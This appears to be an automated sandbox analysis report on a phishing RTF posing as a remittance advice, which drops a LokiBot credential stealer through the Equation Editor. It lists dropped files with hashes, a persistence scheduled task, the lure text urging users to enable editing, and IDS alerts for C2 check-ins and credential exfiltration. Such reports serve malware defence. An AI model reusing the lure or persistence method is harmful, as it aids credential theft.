Entropy (8bit):	1.3560167139182788
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbW:IiiiiiiiiifdLloZQc8++lsJe1MzTl/
MD5:	C7D124FD89D202634A77A7BC866F5A96
SHA1:	26C65C0E15697D8C3721D6201A75719E285D7DD4
SHA-256:	DFDDDC78E2B17F0A6C9C2385C9DD71B6BF55F87667FC863E4EC111FA3576E120
SHA-512:	30AFC0264468BB5E6303D42D2B201E2BE435F59B00772EDBF3C2DCBEE5B23B91806C04E6856AA85515B2B4542461C73AF2F374F3A6ADE64E20FA6BA3F24A80F3
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A3A5CB7-517A-498A-9216-3F1F38B89998}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	3.5020585862813993
Encrypted:	false
SSDEEP:	768:XgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIO:cSyemuSyemuSyemuSyemtJ4Vx0xj
MD5:	D406639A42ACB968A8018DF638DBDB46
SHA1:	F65C538B021D324D52817389515760B6E52C1780
SHA-256:	5B6277008EF1ED6A7CF24B7819E47BDF645406DE07806C5DF7F99681D794EE77
SHA-512:	1C87148A181E9CC0D08BBC873592A385DF5F116FE9FCCEF66615DB1698652637581D9F8CD56E35F21E89C3F9D91EA64F11DBD03C66048761C7B5D8ED56ECAD56
Malicious:	false
Preview:	3.2.3.6.3.2.5.5.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D64B8BBB-F7FA-4868-BA26-522FB5F8B8BC}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1t3siil0.n0s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\4gwcgooj.z3k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\et5ti4wj.m1c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nj3klq2k.amq.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\ozpomub3.qf1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rhckuzog.yj4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\rj0v3nwa.fbr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tipdfnag.n3z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmp5C05.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\sharon38892.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.120660030600629
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2C+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTMv
MD5:	4E9652A356BD536192BD650DF1961E06
SHA1:	1FE8A4CBCECA70ECB2B472BB0A9B400105CC0A6C
SHA-256:	4FEA9ADBC96F8293F2D34018679CA942D983DC8197EC259A8CE914D856069AFA
SHA-512:	D45E8B2F6F92AF9382D5632500517BBB29CB2D81075DD7E46EA03F84F62F8B4011FA388586B70ECE4B25C95AC54452D5AAFFE2DDD29C6D9025445CDF68110D51
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.120660030600629
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt2C+xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTMv
MD5:	4E9652A356BD536192BD650DF1961E06
SHA1:	1FE8A4CBCECA70ECB2B472BB0A9B400105CC0A6C
SHA-256:	4FEA9ADBC96F8293F2D34018679CA942D983DC8197EC259A8CE914D856069AFA
SHA-512:	D45E8B2F6F92AF9382D5632500517BBB29CB2D81075DD7E46EA03F84F62F8B4011FA388586B70ECE4B25C95AC54452D5AAFFE2DDD29C6D9025445CDF68110D51
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\sharon38892.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	771592
Entropy (8bit):	6.706936119730989
Encrypted:	false
SSDEEP:	12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
MD5:	0B67ADEB422396C047E87FA78A9E8E80
SHA1:	0C2BDCFAF8480CFBDC74130E77167280193040D2
SHA-256:	66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
SHA-512:	D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($.....0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

Download File

Process:	C:\Users\user\AppData\Roaming\sharon38892.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Users\user\AppData\Roaming\sharon38892.exe
File Type:	data
Category:	modified
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SCB REmittance Advice.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Thu May 23 17:17:21 2024, length=141374, window=hide
Category:	dropped
Size (bytes):	1069
Entropy (8bit):	4.582845805399027
Encrypted:	false
SSDEEP:	12:8zsC9RgXg/XAlCPCHaXbTBWB/Dr8xX+WXsOcmV+GIotKicvbDSsL8QmV+GI4DtZD:89/XT3oxOBsmc4heiqic4Dv3qGnik7N
MD5:	AFE11A49500B04F455AB8129A222DDBD
SHA1:	F098A88946740E341B9CB9D5CE411BBC83F46E2A
SHA-256:	1B069BF0EA0B46C32C93E11F10F13645CE39A94984D3186CD479B1D87E9A0946
SHA-512:	01A594D6DFDAFCC9695C281FB5AAB3CB2DE5BD7A617E408A2C40CE82E4275044C435F6041CD309486D30D79085C3B751CF30DBA0D6005D09650F02BF77DCF47F
Malicious:	false
Preview:	L..................F.... ....&(.r....&(.r...q&.s=...>(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X(...user.8......QK.X.X(....&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\|.2.>(...X+. .SCBREM~1.DOC..`.......WC..WC..........................S.C.B. .R.E.m.i.t.t.a.n.c.e. .A.d.v.i.c.e...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\SCB REmittance Advice.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.C.B. .R.E.m.i.t.t.a.n.c.e. .A.d.v.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	76
Entropy (8bit):	4.810831711484725
Encrypted:	false
SSDEEP:	3:M1RN/eBTlm4D/eBTlv:Md/eP/er
MD5:	216DED28515FE0191DE4F2203B2F249F
SHA1:	1F663FB4E963827CB116405AF42C46347068A1D3
SHA-256:	D2FEB6606DAC8E48E3F5CC41DDEEA16708582A5330ABD3EEF165CA3C3ABDCF51
SHA-512:	BABE0CA89A26CA6742C49BC190E62DC1E8452945FEBA22D0DA3D2D9AC3F7DC3CA3ABCDC6E78E05E5FFF42C2409CBA651677F4FEBAD8C897B3ADD2D3A7C47929C
Malicious:	false
Preview:	[doc]..SCB REmittance Advice.LNK=0..[folders]..SCB REmittance Advice.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHKFaSbVWS5JKGdln:vdsCkWtsXSxaGdl
MD5:	553FBEA394A1F75A731B9D019444A637
SHA1:	3C8EB332E404FE1435096C376E4E8889804FA767
SHA-256:	FFC2D8AC262C67F55E0606D17F0F643F72F062A81DE2A60B0961A6AC9FE250CD
SHA-512:	CC73D48C77B0B6FAFF77C3960343382D4533B58AAA7E0B60174C02A20183F4E50878E27DEB8501E090058D9D88CE25E3B73701381B69567E84161BB23F3DF592
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe

Download File

Process:	C:\Users\user\AppData\Roaming\sharon38892.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	771592
Entropy (8bit):	6.706936119730989
Encrypted:	false
SSDEEP:	12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
MD5:	0B67ADEB422396C047E87FA78A9E8E80
SHA1:	0C2BDCFAF8480CFBDC74130E77167280193040D2
SHA-256:	66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
SHA-512:	D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($.....0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

C:\Users\user\AppData\Roaming\sharon38892.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	771592
Entropy (8bit):	6.706936119730989
Encrypted:	false
SSDEEP:	12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
MD5:	0B67ADEB422396C047E87FA78A9E8E80
SHA1:	0C2BDCFAF8480CFBDC74130E77167280193040D2
SHA-256:	66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
SHA-512:	D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($.....0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

C:\Users\user\Desktop\~$B REmittance Advice.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHKFaSbVWS5JKGdln:vdsCkWtsXSxaGdl
MD5:	553FBEA394A1F75A731B9D019444A637
SHA1:	3C8EB332E404FE1435096C376E4E8889804FA767
SHA-256:	FFC2D8AC262C67F55E0606D17F0F643F72F062A81DE2A60B0961A6AC9FE250CD
SHA-512:	CC73D48C77B0B6FAFF77C3960343382D4533B58AAA7E0B60174C02A20183F4E50878E27DEB8501E090058D9D88CE25E3B73701381B69567E84161BB23F3DF592
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.6425460199417383
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SCB REmittance Advice.doc
File size:	141'374 bytes
MD5:	a19ff7526e4447064c95123087783231
SHA1:	28cd27bb7050fb4f5534f584b83ca3be90d64ac8
SHA256:	bc6fe96306eb0dcd81bbe50db9e9996b01ca39b22efa79fce253d38532353051
SHA512:	48fdf3b34fad1e18c44e252caf530ded20a595bf0442ea6d50b90b3d623674a5523cd03fbe37ee9268db3d0b22f2d256aa8f8514894188947174b2d0c3fea9fe
SSDEEP:	1536:6wAlRkwAlRkwAlRkwAlRqQD1vzq1VvkwoYOOG:6wAlawAlawAlawAlgQDdyVvzrO3
TLSH:	57D3E26DD34B02598F620377AB1B1E5141BDBA7EF38552B1302C537933EAC39A1252BE
File Content Preview:	{\rtf1..{\*\yjZgfCkgO4Im6Hz2c8Rsj5sxXj2Lw6SqZ9nfoWeM8bUshjo2Alc6lp8idIl2P6E50G9SmZc9lhCjJQ9ju7tHDZdzSxQ7x7Fvx6ZKkt1qwQIb5tQtT}..{\132363255please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statement

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00008F85h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/23/24-20:19:03.316993	TCP	2025381	ET TROJAN LokiBot Checkin	49245	80	192.168.2.22	188.114.97.3
05/23/24-20:19:08.863871	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49251	80	192.168.2.22	188.114.96.3
05/23/24-20:19:13.398917	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49256	80	192.168.2.22	188.114.97.3
05/23/24-20:19:16.005968	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49259	80	192.168.2.22	188.114.97.3
05/23/24-20:19:16.005968	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49259	80	192.168.2.22	188.114.97.3
05/23/24-20:17:35.132025	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49164	80	192.168.2.22	188.114.97.3
05/23/24-20:17:51.806006	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49179	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.079750	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49201	80	192.168.2.22	188.114.97.3
05/23/24-20:18:55.233506	TCP	2025381	ET TROJAN LokiBot Checkin	49236	80	192.168.2.22	188.114.96.9
05/23/24-20:19:04.226888	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49246	80	192.168.2.22	188.114.96.9
05/23/24-20:19:08.863871	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49251	80	192.168.2.22	188.114.96.3
05/23/24-20:19:06.064261	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49248	80	192.168.2.22	188.114.96.3
05/23/24-20:18:18.079750	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49201	80	192.168.2.22	188.114.97.3
05/23/24-20:18:37.677256	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49217	80	192.168.2.22	188.114.96.3
05/23/24-20:19:05.135747	TCP	2025381	ET TROJAN LokiBot Checkin	49247	80	192.168.2.22	188.114.97.9
05/23/24-20:19:06.064261	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49248	80	192.168.2.22	188.114.96.3
05/23/24-20:17:35.132025	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49164	80	192.168.2.22	188.114.97.3
05/23/24-20:18:22.772748	TCP	2025381	ET TROJAN LokiBot Checkin	49206	80	192.168.2.22	188.114.96.3
05/23/24-20:18:30.098368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49214	80	192.168.2.22	188.114.96.9
